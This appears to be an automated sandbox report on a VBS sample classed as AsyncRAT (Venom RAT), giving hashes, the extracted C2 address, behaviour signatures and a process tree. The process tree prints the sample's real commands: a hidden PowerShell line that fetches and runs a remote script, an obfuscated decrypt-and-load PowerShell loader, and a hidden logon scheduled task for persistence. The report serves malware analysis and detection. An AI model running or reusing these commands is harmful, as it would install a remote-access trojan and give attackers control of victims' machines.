Overview

overview

10

Static

static

1

9f0e70dc0d...e2.vbs

windows7-x64

8

9f0e70dc0d...e2.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-12-2024 02:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2.vbs

  • Size

    79KB

  • MD5

    c0e2ce250c4979a59970d22fd99f340f

  • SHA1

    4e5ad3c3ed1e8871abfd8d0f8466b3ddbc521be0

  • SHA256

    9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2

  • SHA512

    f6b43f831302a4760f0d6a8a6e822156b68423f6b0a8e313088007ec28e3e7fc0c9f1ba3659bdff7e7889faf6ec30eb8b826a0a3ebf8c3533b38b0318d483404

  • SSDEEP

    1536:lcX2qy9/TpzprFm7xcGhX4y7t3t+JlpbebTQOsod:lcX2pl+HhXVxqild

Score
10/10
asyncratomen core i9executionpersistencerat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

OMEN core i9

C2

45.88.88.7:4164

Mutex

qqkyuzisfolbtlf

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 19 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2.vbs"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1188
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:376
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1Elx3Sctpo07VJY1RgoaRojmCs/l4e8YyOviovJt3MU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0frhhpE1hB3Q0RCUXEd+g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vNThT=New-Object System.IO.MemoryStream(,$param_var); $tYiMG=New-Object System.IO.MemoryStream; $LFBux=New-Object System.IO.Compression.GZipStream($vNThT, [IO.Compression.CompressionMode]::Decompress); $LFBux.CopyTo($tYiMG); $LFBux.Dispose(); $vNThT.Dispose(); $tYiMG.Dispose(); $tYiMG.ToArray();}function execute_function($param_var,$param2_var){ $zInbo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xuOPn=$zInbo.EntryPoint; $xuOPn.Invoke($null, $param2_var);}$Orgvi = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $Orgvi;$gYhAt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Orgvi).Split([Environment]::NewLine);foreach ($jYIFP in $gYhAt) { if ($jYIFP.StartsWith('hvdMXDExQOuXjNppwfgb')) { $JMsAA=$jYIFP.Substring(20); break; }}$payloads_var=[string[]]$JMsAA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        3⤵
          PID:3524
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4472
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_306_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_306.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3536
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_306.vbs"
            4⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:1444
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_306.bat" "
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1164
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1Elx3Sctpo07VJY1RgoaRojmCs/l4e8YyOviovJt3MU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0frhhpE1hB3Q0RCUXEd+g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vNThT=New-Object System.IO.MemoryStream(,$param_var); $tYiMG=New-Object System.IO.MemoryStream; $LFBux=New-Object System.IO.Compression.GZipStream($vNThT, [IO.Compression.CompressionMode]::Decompress); $LFBux.CopyTo($tYiMG); $LFBux.Dispose(); $vNThT.Dispose(); $tYiMG.Dispose(); $tYiMG.ToArray();}function execute_function($param_var,$param2_var){ $zInbo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xuOPn=$zInbo.EntryPoint; $xuOPn.Invoke($null, $param2_var);}$Orgvi = 'C:\Users\Admin\AppData\Roaming\Windows_Log_306.bat';$host.UI.RawUI.WindowTitle = $Orgvi;$gYhAt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Orgvi).Split([Environment]::NewLine);foreach ($jYIFP in $gYhAt) { if ($jYIFP.StartsWith('hvdMXDExQOuXjNppwfgb')) { $JMsAA=$jYIFP.Substring(20); break; }}$payloads_var=[string[]]$JMsAA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                6⤵
                  PID:3272
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  PID:4976

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        2f57fde6b33e89a63cf0dfdd6e60a351

        SHA1

        445bf1b07223a04f8a159581a3d37d630273010f

        SHA256

        3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

        SHA512

        42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        2KB

        MD5

        005bc2ef5a9d890fb2297be6a36f01c2

        SHA1

        0c52adee1316c54b0bfdc510c0963196e7ebb430

        SHA256

        342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

        SHA512

        f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        b66db53846de4860ca72a3e59b38c544

        SHA1

        2202dc88e9cddea92df4f4e8d83930efd98c9c5a

        SHA256

        b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030

        SHA512

        72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1n11pi01.qk0.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\system.bat
        Filesize

        69KB

        MD5

        8078d12b395b01ad397cec896ae02a6a

        SHA1

        2a5b18660c4b2b40969651ca16a1ede64f3aecf5

        SHA256

        0c691215924b9a058ad733c185b1eb24f5b7be83206ad634a3027bd4641689a7

        SHA512

        df31dc5758e39eaf761d7874ed47ca42274a57b333e7469423c65ecf676e41494e08bb7cf051e21faf39a69fa0198576696e05f981952ce21d714e32cd3bee2a

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Windows_Log_306.vbs
        Filesize

        115B

        MD5

        196f1476d832a6085e80730d7318bc04

        SHA1

        fff8676fdf96eb8655051b14c9e650880dc81945

        SHA256

        17a717c7781f2bc4c1738160eac02c1777517ec62838889e440cade2fa89d55c

        SHA512

        e6f79e4c96748089a73e7a8ae9e95e911cdc7f97fef9a12c88178f185fb8dc4c67dc800bd7eaa025c5bb48909f218ffee87dc8aedc29914af916bf1956e3b2a4

        Download Submit

      • memory/1188-12-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1188-17-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1188-14-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1188-13-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1188-0-0x00007FFE161D3000-0x00007FFE161D5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1188-11-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1188-1-0x000002C9E4350000-0x000002C9E4372000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4472-32-0x00000270EE9E0000-0x00000270EEA24000-memory.dmp

        Filesize

        272KB

        Download

      • memory/4472-33-0x00000270EECD0000-0x00000270EED46000-memory.dmp

        Filesize

        472KB

        Download

      • memory/4472-34-0x00000270EE990000-0x00000270EE998000-memory.dmp

        Filesize

        32KB

        Download

      • memory/4472-35-0x00000270EE9A0000-0x00000270EE9B2000-memory.dmp

        Filesize

        72KB

        Download

      • memory/4976-64-0x000001E3E72E0000-0x000001E3E72F8000-memory.dmp

        Filesize

        96KB

        Download